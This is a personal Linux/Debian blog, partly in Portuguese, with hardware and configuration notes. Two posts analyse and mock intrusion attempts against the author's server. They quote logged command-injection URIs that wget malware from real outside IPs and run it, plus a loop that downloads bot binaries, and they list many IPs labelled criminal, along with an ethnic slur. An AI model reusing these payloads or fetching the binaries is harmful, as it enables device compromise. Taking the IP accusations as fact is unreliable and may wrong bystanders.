Search This Blog

2018-12-05

Network UPS Tools

hardware: https://networkupstools.org/stable-hcl.html

https://mn3m.info/posts/configure-ups-monitor-using-nut-on-debian/

nut.conf

  MODE=standalone

ups.conf

  [ab_ups]
    driver = usbhid-ups
    port = auto
    desc = "AlphaBit UPS"

upsd.conf

  LISTEN 127.0.0.1   3493 # localhost
  LISTEN 192.168.1.5 3493 # interface ip

... :)




2018-10-31

olha... uma ponte barata...

https://nodemcu.readthedocs.io/en/master/en/modules/wifi/

shell nano connect

#!/bin/sh
#
# usa: usb serial arduino
#
# connects to arduino as explained at:
#
https://playground.arduino.cc/Interfacing/LinuxTTY
#
usbSerialArduino () {
  #
  # configure serial port
  #
  stty -F "$1" cs8 9600 ignbrk \
    -brkint -icrnl -imaxbel -opost -onlcr \
    -isig -icanon -iexten -echo -echoe -echok \
    -echoctl -echoke noflsh -ixon -crtscts ;
  #
  # conect to serial port
  #
  busybox microcom -s 9600 "$1" ;
  #
} ;
#
usbSerialArduino /dev/ttyUSB${1:-0} ;
#

2018-10-30

:)

... and welcome to this house of logic ::: alphabit... :)

  https://youtu.be/mx0Lq-I73kg?t=255

2018-10-25

3 knowledge suggestions...

that you should give a try, at least for the sake of knowing them...

1. haskell language

  why: https://youtu.be/LR8fQiskYII?t=163
    lol: https://www.youtube.com/watch?v=dV_mD3SxViQ

  how: http://learnyouahaskell.com/chapters

  libraries: https://hackage.haskell.org/packages/

  bonus: https://xmonad.org/
    https://www.youtube.com/watch?v=LnX3B9oaKzw

2. blender 3D ++

  why: very nice interface... :)

  how: start with an interface usage tutorial

    then modeling: https://www.youtube.com/results?search_query=blender+modeling+tutorial

  libraries: programmable in python

  bonus: https://www.youtube.com/watch?v=mIiY6aGefvI
    https://www.youtube.com/watch?v=biywY5l_2nU
    https://en.blender.org/index.php/Extensions:2.6/Py/Scripts/Import-Export/Paper_Model

3. solvespace by constraining it

  why: keeps it simple... :)

  how: start here... http://solvespace.com/2d.pl

... and ::: genius ... a math little helper...

... all available on debian... :)

2018-08-22

thermal echoes... :)

https://mike42.me/blog/what-is-escpos-and-how-do-i-use-it

https://mike42.me/blog/2015-03-getting-a-usb-receipt-printer-working-on-linux

http://content.epson.de/fileadmin/content/files/RSD/downloads/escpos.pdf

50mm... if not enough chars per line ::: perhaps convert to a bitmap first...

https://manpages.debian.org/stretch/netpbm/pbmtext.1.en.html

... esta' tudo parvo... :( ... onde estao as que imprimem 80 colunas?...

... good old days... when hackers still respected them selves...

https://www.atarimagazines.com/compute/issue40/news_80-column_printer.php

e tu ::: https://www.brother.pt/impressoras-etiquetas/td-4100n
300ppp...
* 120mm = 4.724 * 300 / 80 = 17.715 pixels/char... :D
* 80mm =  3.149 * 300 / 80 = 11.8 pixels/char... :)

... e porque e' que es bue' cara?... 80 colunas e' so' para ricos... :(

... it does seam to work with debian... :)

https://help.brother-usa.com/app/answers/detail/a_id/63186/~/is-there-a-printer-driver-for-the-linux-operating-system%3F

... weee... there is a debian package... :D

http://support.brother.com/g/b/downloadlist.aspx?c=us&lang=en&prod=lptd4100neus&os=130

... and an arch package...
https://aur.archlinux.org/packages/brother-td4100n/

2018-08-16

debian stretch found bugs

this post will be updated with bugs found in debian stretch...

systemctl ::: running as a regular user, using pkexec as gui to authenticate, after asking permission still does does not allow to enable/disable services, is does allow start/stop.

example...

# systemctl enable dnsmasq
Synchronizing state of dnsmasq.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable dnsmasq
update-rc.d: error: Permission denied

... workaround ::: pkexec systemctl enable dnsmasq

haddock ::: generated documentation links to invalid java script.

at java script console...

MathJax.js?config=Te…MS-MML_HTMLorMML:32 WARNING: cdn.mathjax.org has been retired. Check https://www.mathjax.org/cdn-shutting-down/ for migration tips.

... problem is in...

# grep -r 'MathJax.js' /usr/lib/*
Binary file /usr/lib/ghc/bin/haddock matches

... workaround ::: use sed to parse generated files (this message will soon be updated, with the actual code... or maybe i'll just wait for the fix, is quite unnoticeable)

2018-08-12

e mais patos...

... mais pseudo-hackaros-wanna-be a tentar invadir estes dominios com mais parvoeiras sh:

//undefined/login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$

... para comecar, duh ::: Host `undefined' not found!

... e o resto da path serve para nada, nesta terra sem `login.cgi'... talves funcionem melhor noutro planeta, mais standard e que valha mais a pena... para quem quer enricar... por aqui ha' nada para roubar... e as portas abertas a sh carecem existencia... nao temos evaluacoes publicas para desocupados correrem remotamente.

  ... tambem teem a mania que assustam as pessoas, com triplets da moda...

  http://212.237.32.62/666.mp4

  ... lol ::: estao mesmo a precisar de ir aprender com literados.

  ... e tambem usam o debian mais util...
  mas para fins mais frustrados... :(

  http://212.237.32.62/es-mesmo-nabo


... e claro, tambem disponibilizam a obvia parte mais interessante...

  http://212.237.32.62/k

ja' disponivel agora... quem sabe ler que aproveite ou whatever, desta vez nao temos a arvores de directorias hyper linkada... :( ... e um shot para potenciais abacorados leitores em atrazo:

e para os mais noobs... :)

#!/bin/sh
for name in mips mipsel arm arm7 x86_64 x86_32 ;
  do wget http://212.237.32.62/$name ;
done ;

2018-08-11

...

https://www.youtube.com/watch?v=86d55RkBtoI

... e quando e' que esta gente deixa de explodir mesmo?...

2018-07-26

! 404 /Archive/1992-Fact/pascal/*

and others alike... will only be available on next version of our site... hoops!...

! 404 /Archive/1992-Fact/pascal/tpc.cfg ::  TypeError [ERR_HTTP_INVALID_HEADER_VALUE]: Invalid value "undefined" for header "Content-Type"

but: you can get the Borland Pascal...  some where else in the internet

  https://www.google.com/search?q=borland+turbo+pascal

the work around for now (until next unpredictable version of the site) is to find borland pascal somewhere else, compile the downloadable .pas files to pruduce the .exe ... lol, sry...

2018-07-25

uau... que fascinante...

so' ips' publicos a tentar bombar sh esquisos... lol... ja' os prenderam a todos?... estes nao geram execpcoes no nosso servidor, sao ignorados... mas alguem mete servidores a fazer eval's directos de URLs?...

uau... qualquer pessoa que olhe para os seus logs http, fica a saber dos hacks conhecidos... lol... o nosso dominio e' isco para desocupados, posso providenciar listas de IP's criminosos... quem quer comprar?...

lol... e' com cada coisa que se ve para aki a passar... meces sois mesmo um perigo desocupado e com poucos afazeres proprios... quem e' que vos paga a renda para tamanha inutilidade?... um dia destes escrevo a pagina publica destes IP disponivel em realtime para que vos queira apanhar... e informar que ::: deviam arranjar uma vida e evitar ocupar largura de banda.

  07/25.19:35 :: Host `undefined' not found: hanging connection!
* 4 ::ffff:223.135.114.142 8080 undefined /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20dlink%27$
  07/25.19:35 :: Host `undefined' not found: hanging connection!
* 5 ::ffff:223.135.114.142 8080 undefined /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
  07/25.19:35 :: Host `undefined' not found: hanging connection!
* 6 ::ffff:223.135.114.142 8080 undefined /maker/snwrite.cgi?mac=1234;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
  07/25.19:35 :: Host `undefined' not found: hanging connection!
* 7 ::ffff:223.135.114.142 8080 undefined /wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://localhost/1.jpg$(wget$20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz)

LULz... hackers ::: the real challenge, for me, will only start when (anf if) i publicly publish our server source code for every one to see... duh!... then you may try to smartly challenge these domains... lulz... more bugs to solve... how nice, our software improves every day... lulz... entertain us...

"woot, woot"... lulz... esta' com pressa este...

* 12 ::ffff:183.78.180.27 8080 85.243.39.169 /w00tw00t.at.blackhats.romanian.anti-sec:)

keep trying ::: woot, woot... lulz...

olha: mais patos...

92.152.212.2 ... https://iplocation.com/ ... este e' de Franca... se calhar estao a usar o tor... ou entao teem la' amigos... o servidor nas americas e' que e' sempre o mesmo (http://199.195.254.118/) ... neste momento ainda a funcionar, a tal policia ainda nao chegou la'... lol... vou actualizando esta mensagem com patos...

... a agora ja' sabemos que e' ataque especifico aos nossos dominios... trocamos de ip entre cada tentativa... e eles voltam a saber... e' porque conseguem o nosso ip via dns... ou simplesmente estao a atacar em massa os do nosso ISP, pelo menos... alguem nao gosta dos nossos dominios e tem um servidor com ip fixo nas americas... e quer entrar no nosso linux que imaginar que lhes serve `sh'... aka ::: toda a gente (estatais, isps, etc) sabe quem e' e ninguem nos diz... :( ... gostavamos todos de saber quem tem o que^ contra os nossos amigaveis dominios... e' o que o problema?... fome ?... sede?... falta de afazeres proprios?... duh ::: get a life... or continue to help us debug our code... whatever... lol...

cat http.log | grep wget | sed 's/.*wget[^\/]*\/*\([^\/]*\).*/\1/' | sort -u

104.244.72.82
178.128.11.199
185.172.164.41
185.62.190.191
199.195.254.118 (lol)
80.211.62.163
g.mariokartayy.com

... so' IPs de criminosos desocupados a passar... uau... se alguem quiser comprar ::: posso acrescentar o redireccionador e gravar num ficheiro... lol... toma la' uns conhecidos criminosos... devolvam-nos 'as maes, arranjem-lhes ocupacao... qualquer coisa que nao seja ocupar largura de banda... preciso dela para passar os meus zeros e uns, de evitar incomodar outrens... os mais uteis...

lulz ::: bounty hunting... para o nosso pai e' como beber copos de 'agua...

https://www.youtube.com/watch?v=qZx-Z3_n4t8

e os respectivos clientes... possivelmente a usar a rede tor... :) ... se calhar sao grupos deles... lol...
enquanto as criancas vao aprendendo a escrever codigo... com o nosso blog...

cat http.log | grep wget | sed 's/.*f:\([^ ]*\).*wget[^\/]*\/*\([^\/]*\).*/\2 \1/' | sort -u

104.244.72.82 41.36.195.106
104.244.72.82 41.41.83.105
178.128.11.199 133.203.159.184
178.128.11.199 202.226.208.180
178.128.11.199 223.135.114.142
185.172.164.41 197.55.112.173
185.172.164.41 197.55.123.100
185.62.190.191 106.59.240.2
185.62.190.191 109.6.127.147
185.62.190.191 112.222.133.110
185.62.190.191 115.187.39.131
185.62.190.191 117.20.231.152
185.62.190.191 117.3.65.186
185.62.190.191 125.26.182.169
185.62.190.191 138.99.65.16
185.62.190.191 151.66.4.224
185.62.190.191 152.0.1.185
185.62.190.191 170.83.112.59
185.62.190.191 175.138.5.79
185.62.190.191 175.199.173.13
185.62.190.191 177.100.220.111
185.62.190.191 177.137.150.56
185.62.190.191 177.21.36.90
185.62.190.191 177.38.248.205
185.62.190.191 177.8.120.138
185.62.190.191 179.177.242.237
185.62.190.191 181.105.70.233
185.62.190.191 185.55.148.29
185.62.190.191 186.193.54.62
185.62.190.191 186.55.78.167
185.62.190.191 187.94.39.136
185.62.190.191 188.173.57.85
185.62.190.191 190.207.241.182
185.62.190.191 191.54.208.78
185.62.190.191 194.154.73.238
185.62.190.191 195.138.64.192
185.62.190.191 195.158.93.59
185.62.190.191 201.222.28.113
185.62.190.191 202.138.249.221
185.62.190.191 202.188.208.159
185.62.190.191 212.159.145.223
185.62.190.191 212.50.83.152
185.62.190.191 216.58.110.162
185.62.190.191 222.97.179.100
185.62.190.191 223.86.127.150
185.62.190.191 2.32.240.212
185.62.190.191 31.7.232.118
185.62.190.191 37.26.2.122
185.62.190.191 43.247.12.110
185.62.190.191 62.14.149.7
185.62.190.191 62.176.3.146
185.62.190.191 62.211.89.119
185.62.190.191 67.184.138.182
185.62.190.191 70.60.34.179
185.62.190.191 73.92.240.238
185.62.190.191 77.157.30.118
185.62.190.191 78.187.142.229
185.62.190.191 79.10.148.140
185.62.190.191 80.249.84.114
185.62.190.191 83.169.220.208
185.62.190.191 85.211.202.152
185.62.190.191 86.34.10.77
185.62.190.191 87.241.164.103
185.62.190.191 88.249.57.203
185.62.190.191 92.8.84.191
185.62.190.191 92.8.95.119
185.62.190.191 93.174.37.36
185.62.190.191 95.232.4.236
199.195.254.118 156.197.132.62
199.195.254.118 156.198.228.41
199.195.254.118 156.202.160.98
199.195.254.118 156.205.32.0
199.195.254.118 156.208.201.51
199.195.254.118 156.219.179.54
199.195.254.118 197.32.24.151
199.195.254.118 197.38.234.176
199.195.254.118 79.25.214.100
199.195.254.118 92.152.212.2
80.211.62.163 159.146.11.141
g.mariokartayy.com 156.221.8.60

lol...

... sem querer escrevi um servidor de detectar terroristas sem querer... :( ... nao gostam do nosso site... :( ... devem ser racistas do "anti-cristo"... "vai de retro satanas..." ... ainda bem que ja' me perdoaram ::: "ladrao que rouba ladrao..." ... :) ... toda a gente agradece... :D

and they are arabs...

... nothing else to do, but bother people... and forget that are using our (the original programmers, yet not me yet) code... we know what to to with it... you definitely do not... (you help us debug ::: thank you for that uselessness of yours) ... and run, now the cops are coming for you... kidding ::: sadly, they are too unoccupied helping dumb lying girls to keep us away form our starving father... :( ...

156.197.132.62 and 156.208.201.51 ... the not so great frustrated hackers (or changing ip) of the east... with a hacking server in boston (see previous post)... aka: supported by america... uau... amazing...


GRATZ!!!... finally... :)

lol: "first to the key"... thank you, you also earned this post and a report to the cops (for the sake of my children, sorry... at least you get to learn... hopefully to hack better, and for better goals :) ::: someone send something stupid enough to stop our server in its tracks... ("stupid enough": the backend is definitely not sh)... neither URIs used for code evaluation... but the server broke anyways because of parsing... hoops, forgot to catch that exception... aka: dare not to presume that you were smart at all... we do use bash netcat http server for local use... that, by the way, would not come down with this kind of URI... but definitely ::: very nice for future testings, these hacking requests that you send...

2216 ::ffff:156.197.132.62 8080 undefined /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo

Stopping all running ...

Exiting: URIError: URI malformed
    at decodeURIComponent ()
    at splitAndDecode (eval at (54:1), :123:24)
    at KeepItSimple.handler (eval at (54:1), :147:24)

... so is just the parsing that is not ignoring enough... now ::: please retry only in next version, it will take long... and spare us of manual server restarts... nah... better we go with a temporary fix:

  while : ; do http-server ; done ;

... yes ::: give us your IPs...

... now.... let's read this want-to-be-hacker simple line:

  `undefined' : as if we have that virtual host
  `/shell' : as if we match this path or at all evaluate shell commands sent in this uri query part as such
    `cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo'

... so the children can understand...

go to /tmp (and do nothing?... lol...) ; go to /var ; connect to the hacker and download his script `jaws' as `wodo' (lol: trying to scare someone?) ; run it with sh ; and then remove it... lol... where do you hire these noobs!... i don't want to know...

... so... we... lol... rofl... muah... ahahahahhahahah...
we hacked back... and stolen all their hacking scripts...
using the commands :

# we actually using /tmp for these events... lol...
cd /tmp
# using the anonymous tor network
# export http_proxy=socks5://localhost:9050
# hoops : wget does not support socks5, curl does... but not now
# download all their files
wget --recursive \
     --no-clobber \
     --page-requisites \
     --html-extension \
     --convert-links \
     --no-parent \
     199.195.254.118

 how nice of them to leave them publicly available... and tell us about it... poor incompetents from (or sucking) boston... :( ... they are now still wondering why their hack is not recalling... yet our site is down... :( ... so confusing for them... so  i come here and explain to the little children and hackers...

bonus ::: the screenshots of the hackers site... that also use Debian... (nice start)... now ::: go help you neighbors to migrate from windows... please... ip's in the scripts... ???... cd /tmp for nothing?... `jaws'?... `wodo'?... have you rather met jesus... master of the word... duh!... he codes better... you should know him better ::: thou swords are only useless and shameful.

you made the wall ::: have fun...





2018-07-19

join a video with another video's audio...

# ... without heating the chip too much...

cpulimit -fl50 -- ffmpeg -i videosource.avi -i soundsource.mp4 -c copy -map 0:v:0 -map 1:a:0 output.avi

2018-07-04

broken wings... draft...

link=`readlink "${1}" || exit` ;
if [ -e link ] ; # already exists ?
then echo "$link" ; # echo it as is
# otherwise expand variables and sub-scripts
else eval echo "\"${link}\"" |
  # tilde to tilde
  { local h ; h=~ ; sed "s|~|$h|g" ; } ;
  # ... or tilde to $HOME
  # sed "s|~|$HOME|g" ;
fi ;

2018-06-03

code name

lsb_release -cs

# nice to use in scripts... :)

2018-05-25

printrun `.stl' broken in stretch...

python: can't open file 'skeinforge/skeinforge_application/skeinforge_utilities/skeinforge_craft.py': [Errno 2] No such file or directory

this file from this package (that is not a dependency of printrun) does not exist in stretch... :(

applet-alarm-clock not playing sounds...

... in debian stretch...

apt install gtreamer1.0-alsa

otherwise setup custom command in `preferences'...

alsaplayer -q  /path/to/sound.ogg

2018-05-18

EleksMaker X/Y motors do not move...

... using EleksCAM... maybe just because your windows regional settings do not use a dot as decimal separator... it is as stupid as it seams... try this software instead.

2018-05-16

Debian stretch on QC5000M-ITX/PH

QC5000M-ITX/PH

@ BIOS ...

Fast Boot : if enabled grub only boots to /dev/sda1

PS2 Keyboard power on : cannot be actually be disabled
  . enabled : fails to resume properly
  . disabled : works as if enabled... lol... :)

Disable HDMI Audio : to make the sound card the default audio output.

Fails to enable the mouse on resume : choose a permanent usb (ohci) port for the mouse and add the following text to a new file (check that your device id is correct in the `echo' bellow)... make the file executable.

#!/bin/sh
#
# @ "/etc/pm/sleep.d/20_custom-ohci_pci".

case "${1}" in
  hibernate|suspend)
    # Unbind ohci device
    echo '0000:00:13.0' > /sys/bus/pci/drivers/ohci-pci/unbind
  ;;
  resume|thaw)
    # Bind ohci device
    echo '0000:00:13.0' > /sys/bus/pci/drivers/ohci-pci/bind
  ;;
esac

... and now the board works just fine as expected... :)

2017-11-03

bridge problems solved...

... in realtime...

echo 0 > /proc/sys/net/bridge/bridge-nf-call-iptables

... check also this...

https://askubuntu.com/questions/645638/directory-proc-sys-net-bridge-missing

... maybe make persistent... (not tested)...

@ /etc/sysctl.conf

net.bridge.bridge-nf-call-arptables = 0
net.bridge.bridge-nf-call-ip6tables = 0
net.bridge.bridge-nf-call-iptables = 0

net.bridge.bridge-nf-filter-pppoe-tagged = 0
net.bridge.bridge-nf-filter-vlan-tagged = 0

# sysctl -p /etc/sysctl.conf
# reboot

... otherwise, try...

@ /etc/ufw/sysctl.conf

net/bridge/bridge-nf-call-arptables = 0
net/bridge/bridge-nf-call-ip6tables = 0
net/bridge/bridge-nf-call-iptables = 0

# reboot